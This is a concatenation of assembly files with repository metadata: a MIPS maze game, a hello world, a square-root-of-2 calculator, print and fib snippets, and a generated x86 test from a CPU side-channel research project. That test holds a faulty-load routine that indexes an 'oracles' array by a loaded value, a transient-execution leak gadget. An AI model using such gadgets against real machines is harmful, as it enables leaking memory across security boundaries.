beq $a0, 122, L00 #Check if a0 = z if so jump to case L0.
beq $a0, 115, L01 #Check if a0 = s if so jump to case L1.
beq $a0, 113, L02 #Check if a0 = q if so jump to case L2.
beq $a0, 100, L03 #Check if a0 = 100 if so jump to case L3.
beq $a0, 120, ExitEnd #Check if a0 = 120 if so jump to exit.
j Input #Start again.
Table:
L00: add $s7, $s7, 1 #Move 1 position up.
j AssessMove
L01: add $s7, $s7, -1 #Move 1 position down.
j AssessMove
L02: add $s6, $s6, 1 #Move 1 position to the right.
j AssessMove
L03: add $s6, $s6, -1 #Move 1 position to the left.
j AssessMove
#########################################################################################
AssessMove:
sub $gp, $gp, $t0 #Subtract total iterations (*4) from GP to go back to the first pixel.
li $t0, -4 #Reset t0.
li $s4, 0 #Reset s4
li $s5, 0 #Reset s5
rowLoop:
beq $s4, $s1, finalColumnLoop #Run this loop untill we get to the right number on the Y-axes.
li $t9, 0 #Reset t9 so it can be used in the next loop..
addi $s4, $s4, 1 #s1=s1+1
j columnLoop #Go to loop.
columnLoop:
beq $t9, 7, rowLoop #The number 8 will later be represented by a variabel from MazeCreator.
addi $gp, $gp, 4 #Go to next pixel in display.
addi $t0, $t0, 4 #Incrementing current location to next pixel
addi $t9, $t9, 1 #s1=s1+1
j columnLoop
finalColumnLoop:
beq $s5, $s2, check #Run this loop untill we get to the right number on the x-axes.
addi $gp, $gp, 4 #Go to next pixel in display.
addi $t0, $t0, 4 #Incrementing current location to next pixel
addi $s5, $s5, 1 #s1=s1+1
j finalColumnLoop #Go to loop.
check:
la $t6, ($gp) #Put address of gp into t6.#check de kleur van dit adress
lw $t5, -4($gp)
beq $t5, 0x000000ff, Input #Its a wall go back to user input.
beq $t5, 0x00000000, ProcessMove #Move.
beq $t5, 0x0000ff00, Winner #Exit game.
syscall
##########################################################################################
ProcessMove:
ChangePosition: #The new position is valid so within this loop we do two things: 1. Change the old position to a passage. And we change the new position to yellow.
#set this position to yellow
#set old position to yellow. `
sw $t3, -4($gp) #Set new player position to Yellow.
sub $gp, $gp, $t0 #Subtract total iterations (*4) from GP to go back to the first pixel.
li $t0, -4 #Reset t0.
li $s4, 0
li $s5, 0
rowLoop2:
beq $s4, $s6, finalcolumnLoop2 #Run this loop untill we get to the right number on the Y-axes.
li $t9, 0 #Reset t9 so it can be used in the next loop.
addi $s4, $s4, 1 #s1=s1+1
j columnLoop2 #Go to columnLoop2.
columnLoop2:
beq $t9, 7, rowLoop2 #Run this loop untill we have reached the max width of the Maze.(This variabele is given by the drawmaze function).It spots the max width.
addi $gp, $gp, 4 #Go to next pixel in display.
addi $t0, $t0, 4 #Incrementing current location to next pixel
addi $t9, $t9, 1 #s1=s1+1
j columnLoop2 #Go to columnLoop2
finalcolumnLoop2:
beq $s5, $s7, oldPosition #Run this loop untill we get to the right number on the x-axes.
addi $gp, $gp, 4 #Go to next pixel in display.
addi $t0, $t0, 4 #Incrementing current location to next pixel
addi $s5, $s5, 1 #s1=s1+1
j finalcolumnLoop2 #Go to finalcolumnLoop2.
oldPosition:
sw $t2, -4($gp) #Color the old player position black.
move $s1, $s6 #Copy new row position to current position.
move $s2, $s7 #Copy new column position to current position.
j Winner #Go back to ProcessInput to process new input.
########################################################################################
EndConditions:
ExitEnd:
li $v0, 16 #Close file system call.
move $a3, $s6 #Move s6 to a0.
syscall #Close file.
li $v0, 4 #4 is print string sysall.
la $a0, Exitmsg #Move space(next line)to a0 and print a0.
syscall
jr $ra
Winner:
li $v0, 4 #4 is print string sysall.
la $a0, Winnermsg #Move space(next line)to a0 and print a0.
syscall
li $v0, 10 #System call code for exit = 10
syscall #Call operating sys
########################################################################################
input:
.eqv RCR 0xffff0000 #Receiver Control Register (Ready Bit).
.eqv RDR 0xffff0004 #Receiver Data Register (Key Pressed - ASCII).
.eqv TCR 0xffff0008 #Transmitter Control Register (Ready Bit).
.eqv TDR 0xffff000c #Transmitter Data Register (Key Displayed- ASCII).
lw $t0, RCR #Load Ready bit in t0.
andi $t0, $t0, 1 #Check if t0 and t0 = 1. (same bit)
beq $t0, $zero, sleep #If t0 is empty then go to sleep (This is always true because this is loaded before you input a key).
display:
lw $t1, TCR #Load ready bit into t1.
andi $t1, $t1, 1 #Check if t0 and t0 = 1. (same bit)
beq $t1, $zero, display #If t1 is empty then start over again.
sb $a0, TDR #Store the value from TDR in a0.
sb $zero, RDR #Empty RDR adress.
li $v0, 11 #Load Value into v0
syscall
j input #Jump to keywait
sleep:
li $v0, 32
li $a0, 60 #Sleep for 60ms.
syscall #System Call.
lbu $a0, RDR #Set a0 to value of RDR (pressed key).
bge $a0, 1, display #If a0(input value) is bigger than 1 (this is always true if a key has been pressed).
j sleep #Otherwise go to print.
printLoop:
lw $t1,8($t0) #Read control bit.
andi $t1,$t1,0x0001 #Get ready bit.
beq $t1,$0,printLoop #When t1 = 0 start this loop over.
sw $a0, 0xc($t0) #Write the string.
jr $ra #Jump back.
########################################################################################
#Starting Point
main:
jal MazeCreater #This fuction can give back v0,v1 (Current player row and column.)
move $t1, $v0 #Get procedure result
move $t2, $v1 #Get procedure result
move $a0, $t0 #Put procedure arguments.
move $s1, $t1 #Put procedure arguments.
move $s2, $t2 #Put procedure arguments
jal ProcessInput #This fuction takes 3 arguments which is inputkey, player position:row,column.
move $t1, $v0 #Get procedure result
move $t2, $v1 #Get procedure result
#This should be a loop.
exit:
li $v0, 10 #System call code for exit = 10
syscall #Call operating sys
| 40.847656
| 172
| 0.582768
|
f6e3a6db7355640211bd6d03cfcd55a3c7ab5a7a
| 208
|
asm
|
Assembly
|
helloAssembly.asm
|
ericma1999/mips-assembly
|
78d392df09b7864d32a339aa2bf2fe4d86328b7b
|
[
"MIT"
] | null | null | null |
helloAssembly.asm
|
ericma1999/mips-assembly
|
78d392df09b7864d32a339aa2bf2fe4d86328b7b
|
[
"MIT"
] | null | null | null |
helloAssembly.asm
|
ericma1999/mips-assembly
|
78d392df09b7864d32a339aa2bf2fe4d86328b7b
|
[
"MIT"
] | null | null | null |
.data # has all the data of your program
myMessage: .asciiz "Hello World\n"
.text # has all the information that your program needs
li $v0, 4
la $a0, myMessage
syscall # execute the instructions so far
| 23.111111
| 55
| 0.730769
|
5446a56caca2c26928e2e12621f86cfd74b3de1e
| 7,675
|
asm
|
Assembly
|
Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_1546.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 9
|
2020-08-13T19:41:58.000Z
|
2022-03-30T12:22:51.000Z
|
Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_1546.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 1
|
2021-04-29T06:29:35.000Z
|
2021-05-13T21:02:30.000Z
|
Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_1546.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 3
|
2020-07-14T17:07:07.000Z
|
2022-03-21T01:12:22.000Z
|
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r14
push %r8
push %rbp
push %rbx
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0x1129c, %rsi
nop
nop
nop
and $279, %r14
mov $0x6162636465666768, %rdx
movq %rdx, (%rsi)
nop
nop
nop
nop
nop
cmp $12922, %rbx
lea addresses_WC_ht+0xc260, %rbp
nop
nop
nop
nop
nop
cmp $17324, %rbx
and $0xffffffffffffffc0, %rbp
movntdqa (%rbp), %xmm3
vpextrq $0, %xmm3, %r8
xor %r14, %r14
lea addresses_WT_ht+0x1b938, %r8
nop
nop
cmp $42607, %r10
movw $0x6162, (%r8)
nop
nop
nop
nop
nop
xor %rdx, %rdx
lea addresses_A_ht+0x100aa, %r10
nop
nop
nop
nop
nop
sub $44689, %rdx
movb (%r10), %bl
nop
lfence
lea addresses_A_ht+0x8898, %r14
nop
nop
nop
nop
and %r10, %r10
mov $0x6162636465666768, %r8
movq %r8, (%r14)
nop
nop
nop
nop
inc %rbp
lea addresses_normal_ht+0x8ef7, %r8
and %rsi, %rsi
and $0xffffffffffffffc0, %r8
movaps (%r8), %xmm5
vpextrq $0, %xmm5, %r10
sub %r10, %r10
lea addresses_UC_ht+0x9f18, %rsi
lea addresses_D_ht+0x92e5, %rdi
nop
and %r14, %r14
mov $20, %rcx
rep movsb
xor $7661, %rdx
lea addresses_D_ht+0x9996, %rbx
clflush (%rbx)
nop
nop
and $41124, %rsi
movl $0x61626364, (%rbx)
add %r10, %r10
lea addresses_WC_ht+0xe8b4, %rsi
lea addresses_normal_ht+0x1e678, %rdi
clflush (%rsi)
nop
nop
and %r14, %r14
mov $75, %rcx
rep movsw
nop
and %rsi, %rsi
lea addresses_UC_ht+0x19cd8, %rsi
lea addresses_D_ht+0x12058, %rdi
clflush (%rsi)
nop
xor %r10, %r10
mov $16, %rcx
rep movsb
nop
nop
nop
dec %rcx
lea addresses_A_ht+0x8b98, %rdx
nop
nop
nop
nop
cmp %rbp, %rbp
mov $0x6162636465666768, %rbx
movq %rbx, %xmm2
movups %xmm2, (%rdx)
cmp %rcx, %rcx
lea addresses_A_ht+0xc98, %r8
nop
nop
sub %r10, %r10
movups (%r8), %xmm4
vpextrq $1, %xmm4, %r14
nop
nop
nop
sub $61064, %rbx
lea addresses_D_ht+0x11158, %rsi
lea addresses_WT_ht+0x3198, %rdi
clflush (%rsi)
nop
nop
sub %rbx, %rbx
mov $17, %rcx
rep movsb
nop
nop
nop
nop
xor $31827, %rbx
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbx
pop %rbp
pop %r8
pop %r14
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r13
push %r9
push %rax
push %rbp
push %rdi
push %rdx
// Store
lea addresses_PSE+0xfb44, %rdx
nop
and %r13, %r13
mov $0x5152535455565758, %rbp
movq %rbp, %xmm2
movups %xmm2, (%rdx)
nop
nop
nop
nop
nop
add %rdx, %rdx
// Faulty Load
lea addresses_UC+0x4098, %r9
and %rdx, %rdx
vmovups (%r9), %ymm2
vextracti128 $1, %ymm2, %xmm2
vpextrq $0, %xmm2, %r13
lea oracles, %rbp
and $0xff, %r13
shlq $12, %r13
mov (%rbp,%r13,1), %r13
pop %rdx
pop %rdi
pop %rbp
pop %rax
pop %r9
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 0, 'same': False, 'type': 'addresses_UC'}, 'OP': 'LOAD'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 1, 'same': False, 'type': 'addresses_PSE'}, 'OP': 'STOR'}
[Faulty Load]
{'src': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 0, 'same': True, 'type': 'addresses_UC'}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'dst': {'NT': True, 'AVXalign': False, 'size': 8, 'congruent': 0, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'STOR'}
{'src': {'NT': True, 'AVXalign': False, 'size': 16, 'congruent': 3, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'LOAD'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 4, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'STOR'}
{'src': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 1, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 11, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'STOR'}
{'src': {'NT': False, 'AVXalign': True, 'size': 16, 'congruent': 0, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 7, 'same': False, 'type': 'addresses_UC_ht'}, 'dst': {'congruent': 0, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'REPM'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 1, 'same': True, 'type': 'addresses_D_ht'}, 'OP': 'STOR'}
{'src': {'congruent': 2, 'same': False, 'type': 'addresses_WC_ht'}, 'dst': {'congruent': 4, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'REPM'}
{'src': {'congruent': 1, 'same': False, 'type': 'addresses_UC_ht'}, 'dst': {'congruent': 5, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'REPM'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 7, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'STOR'}
{'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 8, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 5, 'same': False, 'type': 'addresses_D_ht'}, 'dst': {'congruent': 8, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'REPM'}
{'37': 21829}
37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37
*/
| 34.886364
| 2,999
| 0.65759
|
40c9b48d3a39c91c5132689a264a0a74fd7573b5
| 9,486
|
asm
|
Assembly
|
calc-sr2.asm
|
cotarr/calc-pi-x86-64-asm
|
1135d8060d3bbcde411cca59587c52287b31ea70
|
[
"MIT"
] | null | null | null |
calc-sr2.asm
|
cotarr/calc-pi-x86-64-asm
|
1135d8060d3bbcde411cca59587c52287b31ea70
|
[
"MIT"
] | null | null | null |
calc-sr2.asm
|
cotarr/calc-pi-x86-64-asm
|
1135d8060d3bbcde411cca59587c52287b31ea70
|
[
"MIT"
] | null | null | null |
;-------------------------------------------------------------
;
; SINGLE THREAD FLOATING POINT MULTI-PRECISION CALCULATOR
;
; Calculation of Roots and Powers
;
; File: calc-sr2.asm
; Module: calc.asm, calc.o
; Exec: calc-pi
;
; Created 12/13/2014
; Last Edit 05/12/2015
;
;--------------------------------------------------------------
; MIT License
;
; Copyright 2014-2020 David Bolenbaugh
;
; Permission is hereby granted, free of charge, to any person obtaining a copy
; of this software and associated documentation files (the "Software"), to deal
; in the Software without restriction, including without limitation the rights
; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
; copies of the Software, and to permit persons to whom the Software is
; furnished to do so, subject to the following conditions:
; The above copyright notice and this permission notice shall be included in all
; copies or substantial portions of the Software.
; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
; SOFTWARE.
;-------------------------------------------------------------
; Function_calc_sr2:
;-------------------------------------------------------------
;
; Rewrite for use with Newton Raphson reciprocal functions.
;
;--------------------------------------------------------
;
; Calculate Square Root of 2
;
; Input: none
;
; During calculation:
; Reg0 - holds next/last guess (not preserved)
;
; After calculation:
; XReg - Square root 2
; Reg0 - not preserved.
;
;-----------------------------------------
;
; Method: Iterative approximations
;
; X(i) = last guess X(i+1) = next guess A = input number
;
; X(i+1) = [ (A / X(i) ) + (X(i)) ] / 2
;
; First guess will be setup in REG0
; A:
; Move REG0 (guess) to ACC
; B:
; Calculate 1/ACC (Reciprocal)
; C:
; Move 2.000... to OPR
; D:
; Multiply OPR * (1/ACC)
; E:
; Move REG0 (guess) to OPR
; F:
; FP_Add (OPR+ACC) = ACC
; G:
; Divide by 2 by decrement exponent
; H:
; Check if Reg0 = ACC
; I:
; Move ACC --> REG0 (to be next guess)
;
;-------------
;
; To reduce time, accuracy is reduced early in the calc
;
;-------------
Function_calc_sr2:
; Preserve registers
;
push rax ; Working REgister
push rbx ; Used to command progress display tool
push rcx ; loop vairiable
push rdx ; Counter matching words
push rsi ; Variable handle
push rdi ; Variable handle
push rbp ; Pointer index
;
;
mov rax, .Msg1
call StrOut
;
;^^^^^^^^^^^^^^^^^^^^^^ Watch Progress ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
mov rbx, 1 ; print iteration counter
mov rax, 0x04000000 ; set skip counter from rbx
call ShowCalcProgress ; initialize
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;
; First make a guess, 1 is as good as any
; Place first guess into Reg0
;
mov rax, 1
mov rsi, HAND_REG0
call FP_Load64BitNumber
;
; Move a copy of the guess to the ACC register
;
mov rsi, HAND_REG0
mov rdi, HAND_ACC
call CopyVariable
;
; Reduce accuracy for the calculation
;
mov rax, 8 ; initial accuracy
mov rbx, rax ; New value in RBX
cmp rbx, MINIMUM_WORD ; Below minimum ?
jge .skip1 ; No, don't adjust
mov rbx, MINIMUM_WORD ; Else, yes, reset to minimum
.skip1:
mov rax, [D_Flt_Word] ; Maximum mantissa size
cmp rax, rbx ; Over maximum size?
jge .skip2 ; No don't adjust
mov rbx, rax ; Else, yes, reset to maximum
.skip2:
mov rax, rbx ; rax input to function
call Set_No_Word_Temp ; Set accuracy
;
; Initialize loop counter
;
mov r8, 0 ; loop counter
;
;-----------------------------
;
; M A I N L O O P
;
;-----------------------------
;
.loop:
;
inc r8 ; increment loop counter
;
; For debugging, exit if counter over limit
;
cmp r8, 200
jl .limitOK
mov rax, .Msg_Error1
call StrOut
mov rax, 0
jmp FatalError
.limitOK:
;
; Calculate reciprocal of guess Guess (first time outside loop)
;
call FP_Reciprocal ; ACC = 1/Guess = 1/Reg0
;
; This is alternate way to calculate reciprocal using
; floatig point division.
;
; mov rax, 1
; mov rsi, HAND_OPR
; call FP_Load64BitNumber ; OPR = 1
; call FP_Division ; ACC = 1/ACC = 1/Guess
;
;
; Multiply 2 * (1/guess)
;
mov rax, 2
mov rsi, HAND_OPR
call FP_Load64BitNumber ; OPR = 2 (for root 2)
;
call FP_Multiplication ; ACC = OPR*ACC = 2 * (1/guess)
;
; Add to last guess
;
mov rsi, HAND_REG0
mov rdi, HAND_OPR
call CopyVariable ; OPR is last guess
;
; Add last guess + new guess
;
call FP_Addition ; ACC = (last guess) + (new guess)
;
; Divide by two by decrement exponent
;
mov rbx, FP_Acc+EXP_WORD_OFST
DEC QWORD [rbx] ; ACC = average --> (last+new)/2
;
;^^^^^^^^^^^^^^^^^^^^^^ Watch Progress ^^^^^^^^^^^^^^^^^^^
; -Print-- Inc/Rset -Format-
mov rax, (0x01110101 | 0x00000804 | 0x20000000 )
call ShowCalcProgress
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;
; Skip first few iterations
;
cmp r8, 4 ; Don't do first few terms, will false done
jl .skip01
;
; Check if done and adjust accuracy if needed.
mov rbx, FP_Acc ; Next guess Xn
mov rdx, FP_Reg0 ; Last guess Xn-1
mov rbp, MAN_MSW_OFST ; Point at MSWord
mov rcx, 0 ; Initialize word Counter
;
; This counts in rcx how many words match
;
.loop_ck:
mov rax, [rbx+rbp] ; Get word from ACC
cmp rax, [rdx+rbp] ; Compare to Reg0
jne .endloop ; Not equal, exit to stop counting
sub rbp, BYTE_PER_WORD ; point at next word
inc rcx ; Increment count of bytes same
mov rax, [LSWOfst] ; Get lower limit index
cmp rbp, rax ; Check if done (checked last word?)
jge .loop_ck ; No, keep checking, else done
.endloop:
;
; Check if at full accuracy, if yes, full accuracy, then check for exit
;
mov rax, [No_Word] ; Get program accuracy
cmp rax, [D_Flt_Word] ; Compare reduced accuracy
jne .skip01 ; Not full accuracy, don't exit
;
; Exit check, if matching enough word and if at full accuracy
mov rax, [No_Word] ; Get word count
sub rax, GUARDWORDS ; Subtract guard words
add rax, 1 ; Option to match guard word (see below)
;----------------------------------------
; at 1,000,000 digits and 3 guard words
;
; #1 with add rax,1 greater than 1 guard word
; 36 term 258 Seconds 00:04:18 (with add rbx,1)
; 2 - (sr2*sr2) = 2.0856 E-1000032
; 33: 32765 No_Word: 51909
; 34: 51906 No_Word: 51909
; 35: 51906 No_Word: 51909
; Then done
;
; #2 without add,rax,1 (all mantissa match)
; 33 term 156 Seconds 00:02:36 (without)
; 2 - (sr2*sr2) = +2.0856 E-1000032
; 31: 16381 No_Word: 32768
; 32: 32763 No_Word: 51909
; 33: 32765 No_Word: 51909
; Then done
;
; Set guard word from 3to 4 and repeat,
; also did same Add,1 in FP_Reciprocal
; Repeat test:
;
; #1 with add rax,1 greater than 1 guard word
; 34 term 155 Seconds 00:02:35
;
; #2 without add,rax,1 (all mantissa match)
; 34 term 155 Seconds 00:02:35
;
; Conclusion, for Newton Raphson approximations
; it is necessary to have 4 guard words.
;---------------------------------------------
;
;
;----------------------------------------
cmp rcx, rax ; Compare number of bytes the same
jl .skip01 ; Do another iteration?
jmp .done ; End calculation, enough words match
;
; Adjust accuracy, rcx = mumber of words the same
;
.skip01:
mov rax, [No_Word] ; Get current mantissa size
shr rax, 1 ; Divide by 2, wait until half of words match
cmp rcx, rax ; Are matching words more than half of words
jl .skip02 ; No don't adjust accuracy
;
mov rbx, [No_Word] ; Get accuracy
shl rbx, 1 ; Increase X 2
mov rax, [D_Flt_Word] ; Maximum mantissa size
cmp rax, rbx ; Over maximum size?
jge .skip_sa2 ; No don't adjust
mov rbx, rax ; Else, yes, reset to maximum
.skip_sa2:
mov rax, rbx ; For call
call Set_No_Word_Temp
;
; Move result back to Reg0 to become next n+1 guess
;
.skip02:
mov rsi, HAND_ACC
mov rdi, HAND_REG0
call CopyVariable ; Reg0 = next guess
; Debug Code
%IFDEF xcv
;
; Debug printing
;
mov rax, .Msg4
call StrOut
mov rax, r8
call PrintWordB10
mov AL, ' '
call CharOut
mov rax, .Msg2
call StrOut
mov rax, rcx
call PrintWordB10
mov AL, ' '
call CharOut
mov rax, .Msg3
call StrOut
mov rax, [No_Word]
call PrintWordB10
call CROut
%ENDIF
;
; Loop back and perform another iteration
;
jmp .loop
;
;------------------------
; Loop exit to here
;------------------------
;
.done:
;
; Copy result back to XREG
;
mov rsi, HAND_ACC
mov rdi, HAND_XREG
call CopyVariable
;
mov rsi, HAND_REG0
call ClearVariable
;
.exit:
;
;^^^^^^^^^^^^^^^^^^^^^^ Watch Progress ^^^^^^^^^^^^^^^^^^^
; -Print-- Inc/Rset -Format-
mov rax, (0x000F0303 | 0x00000000 | 0x30000000 )
call ShowCalcProgress
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;
; Restore Registers
;
pop rbp
pop rdi
pop rsi
pop rdx
pop rcx
pop rbx
pop rax
ret
;
.Msg1: db "Calculating Square Root of 2", 0xD, 0xA, 0
.Msg_Error1: db "Function_calc_sr2: Error: loop counter exceed limit.", 0xD, 0xA, 0
; for debug printing
.Msg2: db "rcx: ", 0
.Msg3: db "No_Word: ", 0
.Msg4: db "r8: ", 0
| 25.363636
| 83
| 0.614063
|
2c8749a629b2dfaa127bada2fe3f38d6995823d1
| 318
|
asm
|
Assembly
|
memory_map/proc/print.asm
|
ilya101010/asm_studies
|
8014446d021b0f3d50f091fd88cbf3ea726fc160
|
[
"WTFPL"
] | 1
|
2019-09-17T01:06:02.000Z
|
2019-09-17T01:06:02.000Z
|
ref/src/proc/print.asm
|
ilya101010/asm_studies
|
8014446d021b0f3d50f091fd88cbf3ea726fc160
|
[
"WTFPL"
] | null | null | null |
ref/src/proc/print.asm
|
ilya101010/asm_studies
|
8014446d021b0f3d50f091fd88cbf3ea726fc160
|
[
"WTFPL"
] | null | null | null |
public _print
; cprint(src,y,color) // null-terminated string
; print: src -> esi, y -> ebx, color -> edx
_print:
; esi contains src
; ebx contains y
; edx contains color
mov eax, 0
call _write
ret
include 'print.inc'
public print
print:
push ebp
mov ebp, esp
Print [ebp+8], [ebp+12], [ebp+16]
pop ebp
ret
| 15.9
| 47
| 0.669811
|
b99f2b95f978cfce4c5b725f2da8c6342ebf9fc8
| 40
|
asm
|
Assembly
|
test/p24.asm
|
slcz/hummingbird
|
8f5d0695a6b6460b1eeaa0e1c520abf6527c0492
|
[
"Apache-2.0"
] | null | null | null |
test/p24.asm
|
slcz/hummingbird
|
8f5d0695a6b6460b1eeaa0e1c520abf6527c0492
|
[
"Apache-2.0"
] | null | null | null |
test/p24.asm
|
slcz/hummingbird
|
8f5d0695a6b6460b1eeaa0e1c520abf6527c0492
|
[
"Apache-2.0"
] | null | null | null |
#include "hi.asm"
li(0xa1)
ror
ror
hlt
| 5.714286
| 17
| 0.675
|
3dc9b3635ffdc2c82d110fcfc5cc2d867246eb64
| 1,826
|
asm
|
Assembly
|
src/fib.asm
|
IGJoshua/assembly-sandbox
|
d9b8f0b9da6a18ab453152eff8ea25729eb10c98
|
[
"MIT"
] | 1
|
2022-01-22T09:02:34.000Z
|
2022-01-22T09:02:34.000Z
|
src/fib.asm
|
IGJoshua/assembly-sandbox
|
d9b8f0b9da6a18ab453152eff8ea25729eb10c98
|
[
"MIT"
] | null | null | null |
src/fib.asm
|
IGJoshua/assembly-sandbox
|
d9b8f0b9da6a18ab453152eff8ea25729eb10c98
|
[
"MIT"
] | null | null | null |
;;; fib.asm
;;; Taken from the nasm tutorial https://cs.lmu.edu/~ray/notes/nasmtutorial/
; -----------------------------------------------------------------------------
; A 64-bit Linux application that writes the first 90 Fibonacci numbers. To
; assemble and run:
;
; nasm -felf64 fib.asm && gcc fib.o && ./a.out
; -----------------------------------------------------------------------------
global main
extern printf
section .text
main:
push rbx ; we have to save this since we use it
